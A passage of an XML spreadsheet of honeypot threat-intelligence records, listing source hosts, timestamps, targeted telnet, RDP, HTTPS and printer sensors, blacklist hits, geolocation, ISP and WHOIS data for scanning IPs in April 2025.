    <s v="2022-05-31"/>
    <s v="connection"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:42f8:f327"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2938"/>
    <x v="2938"/>
    <s v="NA&amp;&amp;129-158-95-178.pool.ukrtel.net"/>
    <x v="0"/>
    <d v="2025-04-05T23:27:01"/>
    <d v="2025-02-15T21:04:42"/>
    <d v="2025-04-05T23:27:01"/>
    <n v="58"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv (Shevchenkivs'kyi district)"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4443"/>
    <s v="30.5108"/>
    <s v="6849"/>
    <s v="PJSC Ukrtelecom"/>
    <s v="UKRTELECOM"/>
    <s v="residential"/>
    <s v="JSC Ukrtelecom"/>
    <s v="2009-12-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1997-01-11 05:00:00"/>
    <s v="2026-01-10 05:00:00"/>
    <s v="2024-12-03 08:56:02"/>
    <s v="['EXPERT-DP.UKRTEL.NET', 'EXPERT.UKRTEL.NET', 'NS1-01.AZURE-DNS.COM', 'NS2-01.AZURE-DNS.NET', 'NS3-01.AZURE-DNS.ORG', 'NS4-01.AZURE-DNS.INFO']"/>
    <s v="Internet Invest, Ltd. dba Imena.ua"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="33"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b25f:9e81"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2939"/>
    <x v="2939"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T23:17:58"/>
    <d v="2025-04-05T23:17:58"/>
    <d v="2025-04-05T23:17:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']}"/>
    <n v="37"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:e82b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2940"/>
    <x v="2940"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T23:03:00"/>
    <d v="2025-04-05T01:44:52"/>
    <d v="2025-04-05T23:03:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:5178"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2941"/>
    <x v="2941"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T22:50:14"/>
    <d v="2025-04-05T22:50:14"/>
    <d v="2025-04-05T22:50:14"/>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3b5d:329d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2942"/>
    <x v="2942"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T22:41:08"/>
    <d v="2025-04-05T22:41:08"/>
    <d v="2025-04-05T22:41:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:aec9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2943"/>
    <x v="2943"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T22:35:18"/>
    <d v="2025-04-03T16:26:19"/>
    <d v="2025-04-05T22:35:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Jung-gu"/>
    <s v="Jung-gu"/>
    <s v="1845068"/>
    <s v="700112"/>
    <s v="37.5601"/>
    <s v="126.996"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Daegusicheong"/>
    <s v="2005-08-23"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d89:49fa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2944"/>
    <x v="2944"/>
    <s v="110235057084.ctinets.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T21:47:42"/>
    <d v="2025-02-18T21:50:13"/>
    <d v="2025-04-05T21:47:42"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="2009-05-15"/>
    <s v="HKBN-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1998-06-01 04:00:00"/>
    <s v="2027-05-31 04:00:00"/>
    <s v="2022-04-28 06:31:12"/>
    <s v="['NS1O.CTIHK.COM', 'NS2O.CTIHK.COM']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:6eeb:3954"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2945"/>
    <x v="2945"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T21:42:26"/>
    <d v="2025-04-05T21:42:26"/>
    <d v="2025-04-05T21:42:26"/>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3b62:caf0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2946"/>
    <x v="2946"/>
    <s v="ec2-13-218-198-5.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T21:35:37"/>
    <d v="2025-04-05T21:33:15"/>
    <d v="2025-04-05T21:35:37"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-01"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dda:c605"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2947"/>
    <x v="2947"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T20:46:23"/>
    <d v="2025-04-05T13:10:57"/>
    <d v="2025-04-05T20:46:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:592f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2948"/>
    <x v="2948"/>
    <s v="pl12140.ag1313.nttpc.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-05T20:45:21"/>
    <d v="2025-04-05T20:45:21"/>
    <d v="2025-04-05T20:45:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="18"/>
    <s v="Fukui"/>
    <s v="Echizen"/>
    <s v="Echizen"/>
    <s v="11612457"/>
    <s v="NA"/>
    <s v="35.8857"/>
    <s v="136.171"/>
    <s v="2514"/>
    <s v="INFOSPHERE NTT PC Communications, Inc."/>
    <s v="NTT PC Communications, Inc."/>
    <s v="corporate"/>
    <s v="InfoSphere"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.sphere.ad.jp', 'ns2.sphere.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/08/31)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2a5:406c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2949"/>
    <x v="2949"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T20:42:59"/>
    <d v="2025-02-28T00:13:18"/>
    <d v="2025-04-05T20:42:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:bdd6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2950"/>
    <x v="2950"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T20:17:02"/>
    <d v="2025-04-05T20:17:02"/>
    <d v="2025-04-05T20:17:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Dorāha"/>
    <s v="1272375"/>
    <s v="NA"/>
    <s v="30.7995"/>
    <s v="76.0236"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:134d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2951"/>
    <x v="2951"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T20:15:55"/>
    <d v="2025-04-05T11:13:29"/>
    <d v="2025-04-05T20:15:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:269a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2952"/>
    <x v="2952"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T20:10:40"/>
    <d v="2025-04-05T09:19:18"/>
    <d v="2025-04-05T20:10:40"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b61:d753"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2953"/>
    <x v="2953"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T20:06:11"/>
    <d v="2025-04-05T12:37:25"/>
    <d v="2025-04-05T20:06:11"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:c2e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2954"/>
    <x v="2954"/>
    <s v="NA&amp;&amp;pcd349212.netvigator.com"/>
    <x v="0"/>
    <d v="2025-04-05T20:05:08"/>
    <d v="2025-04-05T09:13:23"/>
    <d v="2025-04-05T20:05:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="2001-01-25"/>
    <s v="NETVIGATOR"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-02-09 05:00:00"/>
    <s v="2026-02-10 05:00:00"/>
    <s v="2025-02-06 06:38:39"/>
    <s v="['NS4.NETVIGATOR.COM', 'NS5.NETVIGATOR.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="24"/>
    <s v="NA"/>
    <s v="RM902, 9F East Exchange Tower 38-40 Leighton Road"/>
    <s v="::ffff:cbda:8bd4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2955"/>
    <x v="2955"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T19:41:48"/>
    <d v="2025-04-03T21:14:45"/>
    <d v="2025-04-05T19:41:48"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_RDP_H36&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="3389&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Erie"/>
    <s v="Buffalo"/>
    <s v="5110629"/>
    <s v="14205"/>
    <s v="42.8864"/>
    <s v="-78.8784"/>
    <s v="36352"/>
    <s v="HostPapa"/>
    <s v="HostPapa"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2013-08-16"/>
    <s v="CC-16"/>
    <s v="2024-02-02"/>
    <s v="connection&amp;&amp;stshash"/>
    <s v="{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
